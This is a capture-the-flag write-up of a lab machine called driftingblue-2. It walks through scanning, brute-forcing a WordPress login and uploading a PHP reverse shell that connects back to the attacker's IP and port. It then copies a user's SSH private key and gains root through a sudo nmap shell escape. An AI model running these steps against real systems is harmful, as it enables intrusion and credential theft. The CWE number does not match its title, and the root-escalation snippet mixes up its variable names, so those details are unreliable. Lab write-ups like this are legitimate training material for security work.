## Version 1.4.1
## language: en

Feature:
  TOE:
    driftingblue-2
  Category:
    Remote Code Execution
  Location:
    http://driftingblues.box/blog/wp-admin/theme-install.php
  CWE:
    CWE-94: Reliance on Reverse DNS Resolution for a Security-Critical Action
  Rule:
    REQ.41: https://fluidattacks.com/products/rules/list/041/
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better filter correctly uploaded files to verify that they don't have
    malicious code

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Nmap                       | 7.91     |
    | Gobuster                   | 3.0.1    |
    | Medusa                     | 2.2      |
    | WPScan                     | 3.8.17   |
    | stegcracker                | 2.1.0    |
    | netcat                     | 1.10     |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on virtualbox
    Then I saw that the machine was running Debian 10 [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet1
    """
    And I got the next result
    """
    vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
    inet 172.16.33.1/29 brd 172.16.33.7 scope global vmnet1
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:1/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 172.16.33.0/29
    """
    And I got the next result
    """
    Nmap scan report for 172.16.33.1
    Host is up (0.0022s latency).
    Nmap scan report for 172.16.33.5
    Host is up (0.00045s latency).
    """
    Then I knew that 172.16.33.5 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -p- -A -sV 172.16.33.5
    """
    And I got the next result
    """
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     ProFTPD
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-rwxr-xr-x   1 ftp      ftp       1403770 Dec 17 13:20 secret.jpg
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
    |   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
    |_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I saw that port 80 was used by HTTP with Apache in its version 2.4.38
    And SSH was using openSSH in its version 7.9 on port 22
    And port 21 was used by FTP service with ProFTPD

  Scenario: Normal use case
    Given HTTP was working on port 80
    Then I accessed to the main webpage on 172.16.33.5:80 using browser
    And there I saw the following web site [evidence](02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I accessed to the FTP server with Anonymous credentials
    And thus I could enter to the FTP server
    Then I saw an image
    """
    331 Anonymous login ok, send your complete email address as your password
    Password:
    230 Anonymous access granted, restrictions apply
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT command successful
    150 Opening ASCII mode data connection for file list
    -rwxr-xr-x   1 ftp      ftp       1403770 Dec 17 13:20 secret.jpg
    226 Transfer complete
    """
    Then I downloaded that image
    Then I analyzed that image with stegcracker to search embedded files
    And I didn't found any hidden message
    Then I decided to search possible hidden directories with gobuster
    Then I got the following result
    """
    ===============================================================
    2021/04/07 12:08:59 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html  (Status: 200) [Size: 128]
    /blog        (Status: 301) [Size: 309] [--> http://172.16.33.5/blog/]
    /.           (Status: 200) [Size: 128]
    ===============================================================
    2021/04/07 12:23:11 Finished
    ===============================================================
    """
    Then I entered to the blog directory [evidence](03.png)
    Then I inspected the post in the blog
    Then I realized who was the user that wrote the posts [evidence](04.png)
    Then I used WPScan to do a brute force attack to the login webpage
    And for that I utilized albert as user
    Then I could get the credential to log me [evidence](05.png)
    Then I authenticated me with those credentials
    And thus I accessed to the management platform [evidence](06.png)
    Then I downloaded the reverse-shell from the next link
    """
    https://github.com/pentestmonkey/php-reverse-shell/blob/master/
    php-reverse-shell.php
    """
    Then I modified that file with the attacker ip address in the next way
    """
    $ip = '172.16.33.1';
    $port = 4444;
    """
    Then I uploaded that file in the management platform [evidence](07.png)
    Then I put port 4444 in listening mode using netcat


  Scenario: Exploitation
    Given previously I'd put port 4444 in listening mode
    Then I executed the uploaded file
    And thus I got remote connection [evidence](08.png)
    Then I checked /etc/passwd file
    And there I identified the freddie user [evidence](09.png)
    Then I entered to the freddie's home directory
    Then I listed files in that directory
    """
    drwxr-xr-x 3 freddie freddie 4096 Dec 17 07:58 .
    drwxr-xr-x 3 root    root    4096 Dec 17 07:46 ..
    -rw-r--r-- 1 freddie freddie  220 Dec 17 04:15 .bash_logout
    -rw-r--r-- 1 freddie freddie 3526 Dec 17 04:15 .bashrc
    -rw-r--r-- 1 freddie freddie  807 Dec 17 04:15 .profile
    drwxr-xr-x 2 freddie freddie 4096 Dec 17 05:45 .ssh
    -r-------- 1 freddie freddie 1801 Dec 17 07:10 user.txt
    """
    Then I visualized the user.txt file
    And in that way I found the first flag [evidence](10.png)
    Then I noted that I could access to the .ssh directory
    Then I listed files in that directory
    """
    -r-------- 1 freddie freddie  396 Dec 17 05:45 authorized_keys
    -rwxr-xr-x 1 freddie freddie 1823 Dec 17 05:33 id_rsa
    -r-------- 1 freddie freddie  396 Dec 17 05:33 id_rsa.pub
    """
    Then I realized that I could inspect the private key
    Then I checked that key [evidence](11.png)
    Then I copied the private key
    And thus I could log me through SSH as the freddie user [evidence](12.png)
    Then I inspected if I could execute the sudo command
    """
    Matching Defaults entries for freddie on driftingblues:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:
    /usr/sbin\:/usr/bin\:/sbin\:/bin
    User freddie may run the following commands on driftingblues:
    (root) NOPASSWD: /usr/bin/nmap
    """
    Then I realized that I could execute nmap as the root user
    Then I executed the following command to get the root privileges
    """
    SC=$(mktemp)
    echo 'os.execute("/bin/bash")' > $TF
    sudo nmap --script=$TF
    """
    Then I got the root permissions
    Then I listed files in the root directory
    Then I visualized the second flag
    And thus I solved the challenge[evidence](13.png)

  Scenario: Remediation
    Given that the passwords are weak
    And it isn't checked that uploaded files don't have malicious code
    And sensitive files and directories are accessed to the public
    And unprivileged users are authorized to execute commands as the root user
    Then it'd better avoid uploading files without the corresponding validation
    And establish good password policies to have strong passwords
    And avoid that unprivileged users access to the sensitive files or keys
    And avoid that unauthorized users execute commands as the root user

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.9/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.7/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.6/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-04-07
